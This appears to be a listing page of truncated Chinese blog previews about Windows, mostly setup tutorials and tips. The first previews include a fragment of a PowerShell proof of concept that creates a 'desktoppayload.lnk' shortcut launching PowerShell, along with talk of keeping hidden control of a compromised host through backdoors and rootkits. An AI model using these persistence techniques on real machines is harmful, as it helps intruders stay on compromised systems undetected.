POC:  $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("desktop\desktoppayload.lnk") // 在桌面创建快捷方式按钮 $Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" // 执行文件 $Short…

当你拿到了系统控制权之后如何才能更长的时间内控制已经拿到这台机器呢?作为白帽子,已经在对手防线上撕开一个口子,如果你需要进一步扩大战果,你首先需要做的就是潜伏下来,收集更多的信息便于你判断,便于有更大的收获.用什么方法才能有尽可能高的权限,同时能更有效的隐藏自己,是留webshell,留后门,种木马还是Rootkit?webshell,哪怕是一句话木马都很容易被管理员清除,放了木马,也容易被有经验的管理员查出,不管是早期自己创建进程,进程被干掉就完了,还是注入进程的木马,或者是以服务自启动的木马…

新的winserver2016支持了一种nano模式,像以前的core模式,只能远程管理,只支持x64,只有610M,不让CentOS mini版独美. 这个nano版,默认只开启WinRM,所以只能PowerShell,安装后F11重置密码即可使用. Windows Server 2008以后有Core安装模式(安装后磁盘占用2G+),设置密码后,sconfig,配置远程管理,开启powershell与服务器管理器远程管理. 下面是.net的程序方式像远程传输文件. 前提是,本地与远程的Pow…

1.我的键盘:windows键的开启,需要按住FN键+windows键. 2.windows键 + E,表示打开我的电脑. 3.windows键 + R,打开windows的命令行窗口. 4.windows键 + D,桌面与窗口之间切换. 5.windows键 + M,窗口最小化. 6.windows键 + TAB,预览和切换(桌面和多窗口). 7.windows键,开始. Windows功能键+D:显示桌面,隐藏窗口:Windows功能键+E:打开资源管理器窗口:Windows功能键+F:搜索…

一.dos命令[重难点]1.OS——操作系统2.如何进入dos窗口?——P111 开始——程序——运行——输入cmd3.常用的dos操作命令 3.1 返回上一级 cd.. 3.2 返回到根目录 cd\ 3.3 进入指定的磁盘 输入磁盘名: 3.4 进入该磁盘下某个指定的文件夹 cd 文件夹名 3.5 查看某磁盘或文件夹下所有的内容 dir 3.6 创建文件夹——P113页 md 文件夹名 3.7 删除[空文件夹]——rd 文件夹名 3.8 删除非空的文件夹 rd /s 文件夹名 3.9 在指定的…

半年前我开源了 DreamScene2 一个小而快并且功能强大的 Windows 动态桌面软件.有很多的人喜欢,这使我有了继续做开源的信心.这是我的第二个开源作品 ScreenshotEx 一个简单易用的 Windows 截屏增强工具. 欢迎 Star 和 Fork https://github.com/he55/ScreenshotEx 前言 在使用 Windows 系统的截屏快捷键 PrintScreen 截屏时,如果需要把截屏保存到文件,需要先粘贴到画图工具然后另存为文件.以前我还没有觉得…

今天心血来潮把几个自己常用的工具定制到了系统的右键菜单.包括notepad++,7zip,还有复制文件全路径和文件夹路径.下面简单介绍一下步骤. 1. Windows系统右键菜单对应的注册表位置 Windows系统的右键菜单对应着如下的注册表位置. 1)所有文件的右键菜单: 2)所有目录的右键菜单: 2.添加自己定制的右键菜单 1)如下的代码存为.reg文件,双击就能把注册表键值导入到注册表中. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20…

转载:http://www.mottoin.com/tech/109219.html 渗透技巧—获得Windows系统的远程桌面连接历史记录 0x00 前言 在渗透测试中,远程桌面连接的历史记录不可忽视,根据历史记录往往能定位出关键的服务器. 前几天有一篇文章介绍了如何清除记录,那么这篇文章就来介绍一下如何导出历史记录. 清除记录的文章地址如下: http://woshub.com/how-to-clear-rdp-connections-history/#h2_3 最开始的设想是通过枚举注册表…

国内目前关注最高,维护最好的一个关于nodejs的网站应该是http://www.cnodejs.org/ windows系统下简单nodejs环境配置. 第一步:下载安装文件 下载地址:官网 https://nodejs.org/en/download/   这里用的是  第二步:安装nodejs 下载完成之后,双击 node-v6.9.1-x64.msi,开始安装nodejs,默认是安装在C:\Program Files\nodejs下面 第三步:安装相关环境 打开C:\Program Fi…

linux/windows系统oracle数据库简单冷备同步 我们有一个财务系统比较看重财务数据的安全性,同时我们拥有两套系统,一个生产环境(linux),一个应急备份环境(windows).备份环境对生产环境实行实时备份同步,备份方式也有两种:热备冷备.oracle热备一般用oracle DG服务即可,但oracle DG服务是要另行收费的,这对于客户来说也是一笔不小的开支.于是我们采用oracle冷备的方式,基本流程是:数据库定时通过expdp方式导出,然后通过ftp传到应急备份环境,应急备…

一.硬件:易pc,1G容量以上的u盘,另外还要一台装了windows系统的电脑. 二.软件: 1.windows xp的安装包.考虑到易PC的硬盘容量,还是用精简版的吧,比如“Deepin XP Lite 完美精简版 V5.8 正式版”.地址:http://www.52zy.com/down/5.html 2.flashboot.用来把u盘做成启动盘.下载地址:http://www.pzz.cn/soft/flashboot.rar 3.diskgen,一个系统分区软件.下载地址:http://…

简单易用的堡垒机系统-Teleport 官方文档:http://teleport.eomsoft.net/doc#!1  一.Teleport介绍 Teleport是触维软件推出的一款简单易用的堡垒机系统,具有小巧.易用.易于集成的特点,支持RDP和SSH协议的跳转. Teleport由两大部分构成: Teleport跳板核心服务 WEB操作界面 Teleport非常小巧且极易安装部署:仅需一分钟,就可以安装部署一套您自己的堡垒机系统!! 支持的操作系统 Teleport支持部署到Linux系统…

  相信对于很多关注javascript发展的同学来说,nodejs已经不是一个陌生的词眼,这里不想谈太多的nodejs的相关信息.只说一下,windows系统下简单nodejs环境配置     相信对于很多关注javascript发展的同学来说,nodejs已经不是一个陌生的词眼.有关nodejs的相关资料网上已经铺天盖地.由于它的高并发特性,造就了其特殊的应用地位. 国内目前关注最高,维护最好的一个关于nodejs的网站应该是http://www.cnodejs.org/  这里不想谈太多的…

国内目前关注最高,维护最好的一个关于nodejs的网站应该是http://www.cnodejs.org/ windows系统下简单nodejs环境配置. 第一步:下载安装文件 下载地址:官网 https://nodejs.org/en/download/   这里用的是  第二步:安装nodejs 下载完成之后,双击 node-v6.9.1-x64.msi,开始安装nodejs,默认是安装在C:\Program Files\nodejs下面 第三步:安装相关环境 打开C:\Program Fi…

服务器管理工具它是一款功能强大的服务器集成管理器,包含win系统和linux系统的批量连接,vnc客户端,ftp客户端等等实用功能.我们可以使用这款软件的ftp客户端定时上传下载的功能来进实现ftp客户端自动同步.它简单操作又安全,还可以大大节约我们的时间.精力,提升我们的工作效率,因此很受站长及运维人员的喜欢.接下来详细介绍下它是如何实现Windows系统简单操作ftp客户端自动同步. 服务器管理工具定时上传下载的步骤:1.打开IIS7服务器管理工具,找到FTP2.添加FTP的IP端口,账户,…

(超简单)VScode配置C/C++环境图文教程(Windows系统下) 本文参考文章 Visual Studio Code (vscode) 配置 C / C++ 环境 下载VScode.下载MinGW64以及配置环境变量各种前置工作各种教程讲的比较完备(不会的可以停下去参考一下其他教程),在这里我就不再赘述这些工作,直接进入大家头疼的配置文件相关内容. 1. 本机新建空文件夹 这个文件夹一般作为项目的根目录,所以请选择在合适位置创建. 2. 使用VScode打开刚才的文件夹 注意这里是使用V…

EasyReport是一个简单易用的Web报表工具(支持Hadoop,HBase及各种关系型数据库),它的主要功能是把SQL语句查询出的行列结构转换成HTML表格(Table),并支持表格的跨行(RowSpan)与跨列(ColSpan).同时它还支持报表Excel导出.图表显示及固定表头与左边列的功能.总体架构如下图所示: 目录 开发环境(Development Environment) 安装与部署(Installation & Deployment) 从源代码安装(From Source Co…

平时测试工作中,少不了制造测试数据.最近一个项目,我就需要制造一批可在UNIX下正确读取的文件.为确保这批文件能从FTP下载成功,开发叮嘱我:“文件中凡是遇到换行,换行符必须是UNIX下的LF,而不是Dos\Windows下的CRLF.” 换行,在普通文档编辑中,就是按下“Enter”键.在编写代码时,就是在文件中写入字符串”\n”.但用python命令w在文件写入换行”\n”以后,由于是Windows系统的原故,会默认把”\n”实际保存为”\r\n”. 对于Windows下为何是”\r\n”,…

1 Microsoft Windows 系统错误代码简单分析: 0000 操作已成功完成.0001 错误的函数. 0002 系统找不到指定的文件. 0003 系统找不到指定的路径. 0004 系统无法打开文件. 0005 拒绝访问. 0006 句柄无效. 0007 存储区控制块已损坏. 0008 可用的存储区不足,无法执行该命令. 0009 存储区控制块地址无效. 0010 环境错误. 0011 试图使用不正确的格式加载程序. 0012 访问代码无效. 0013 数据无效. 0014 可用的存储…

一.Linux以及Windows系统的优缺点对比   Windows Linux 优点 Windows Server系统相对于其他服务器系统而言,极其易用,极大降低使用者的学习成本. Linux系统是开源系统,受到所有开发者的共同监督,已经是非常成熟的服务器系统,并且拥有着一套完整的权限机制,安全性与稳定性都很高. 缺点 Windows Server系统对服务器硬件要求较高.稳定性不是很好. Linux学成成本高,需要花更多的时间学习 适用范围 Windows Server系统适用于中.低档服务…

说明:1.如果你会emWin话的,就可以轻松制作上位机.做些通信和控制类上位机,比使用C#之类的方便程度一点不差,而且你仅会C语言就可以.2.并且成功将emWin人性化,可以做些Windows系统上的小应用了,基本完全看不出是emWin做的,而且生成的软件很小.Win32 API编写的软件,最大的好处就是微软的各个系统版本都兼容,而且发布时软件比较小,仅仅一个exe小软件.3.无需用户自己编写USB BULK驱动程序,详情见教程中1.4小节说明即可.同时,上位机设计中需要用到的各种文档.软件.驱…

关于 GetVersion 系列接口 关于如何获取 Windows 系统版本号的话题,网上已经有了太多的帖子.但个人觉得总结的都不尽全面,或者没有给出比较稳定的解决方案. 众所周知,获取 Windows 系统版本的 API 是 GetVersion 和 GetVersionEx.这两个 API 的使用也都相当简单,一直被广泛使用(下文中我们将其统称为 GetVersion 系列).后来在 Windows XP 中微软引入了应用程序兼容模式,可以选择以兼容之前 Windows 系统版本的模式运行程…

用PE安装Windows系统 认识PE系统 Windows Preinstallation Environment(Windows PE),Windows预安装环境,是带有有限服务的最小Win32子系统,基于以保护模式运行的Windows XP Professional及以上内核.它包括运行Windows安装程序及脚本.连接网络共享.自动化基本过程以及执行硬件验证所需的最小功能. Windows PE含有Windows XP.Windows Server 2003.Windows Vista.W…

上帝模式,,即"God Mode",或称为"完全控制面板".是Windows Vista/7系统中隐藏的一个简单的文件夹窗口,但包含了几乎所有Windows系统的设置,如控制面板的功能.界面个性化.辅助功能选项等方方面面的控制设置,用户只需通过这一个窗口就能实现所有的操控,而不必再去为调整一个小小的系统设置细想半天究竟该在什么地方去打开设置窗口.此功能同样适用于所有NT6.0以上(包括6.0)的操作系统. 开启方法: 1.在桌面新建一个文件夹 2.然后将文件夹更改为…

原文:https://blog.csdn.net/wokaowokaowokao12345/article/details/76736152 MySQL在windows系统的安装 原创 2017年08月05日 22:02:45 标签: mysql / 数据库 / sql server 9518 引言 MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品.MySQL分为社区版和商业版,具有体积小.速度快.成本低.开源的优点.MySQL备受互联网公…

Windows系统的Jenkins持续集成环境 如题:本文将介绍如何在Windows环境下运用Jenkins部署持续集成环境.之所以写本文,是因为在最近工作当中,学习使用Jenkins时,确实遇到了一些问题,而大多数教程文档都是基于Mac或是Linux平台.为此很是头疼,经过一番摸索,终于走通了Windows平台下的一条路. 本CI系统流程:Dev提交代码,并merge到master分支-->Jenkns获取最新代码,开始构建(解析git触发响应,build solution,run autom…

首先到官网下载node.js http://nodejs.cn 下载完成后一直下一步Next即可安装完成,路径可以自己设置 然后配置环境变量,将node安装的目录配置到Path中 例如: cmd打开命令窗口查看node和npm的版本,看是否安装与配置成功,Windows系统自带npm npm -v node -v 如下出现版本号,说明安装成功 然后我们来简单写一个js文件,用node来运行一下 我这里在D盘下新建一个nodeTest文件夹 然后新建一个hello文本文件 打开文本文件输入一句话c…

一. 引流测试产生背景 日常大部分的测试工作都是在测试环境下,通过模拟用户的行为来对系统进行验证,包括功能以及性能.在这个过程中,你可能会遇到以下问题: 用户访问行为比较复杂,模拟很难和用户行为一致,模拟不够真实; 线下模拟场景有限,会出现业务覆盖不全的情况. 引流测试的出现就是为了解决以上问题,它的本质是:通过把线上的真实流量复制到线下环境,解决测试环境模拟不够真实,或覆盖不够全面的问题. 二. 引流测试常见方案 目前不少公司对引流测试进行了实践探索,常见的有以下4种引流方式(不限): 引流方…

Python有个第三方模块叫做PIL是Python Imaging Library的缩写,是用来进行图像处理的,比如,改变图片颜色,图片缩放,图片裁剪等等基本图片操作.它还包含一个截屏的功能. 从以上介绍来看,PIL已经是Python平台的图像处理标准库了,功能也非常强大,API也非常简单易用,因此,深受大家的喜爱. 估计很多人都想问:自动化截屏有什么用?为什么要实现自动化截屏呢?虽然大多数情况下是没有太多实用性.但是,其实在某些特殊的场景下来记录电脑使用者的操作还是很有必要的.比如,银行记录柜…

开发环境搭建(Windows) 系统要求 设置FLutter镜像(非必须) 获取Flutter SDK Android开发环境设置 安装Flutter插件 系统要求 在Windows上要安装并运行Flutter要满足以下最低要求: 操作系统: Windows 7 SP1或更新版本 磁盘空间: 400 MB (Android Studio的磁盘空间). 工具: Flutter 依赖下面这些命令行工具: Windows PowerShell 5.0 Windows 10已经预装了这个工具: Git…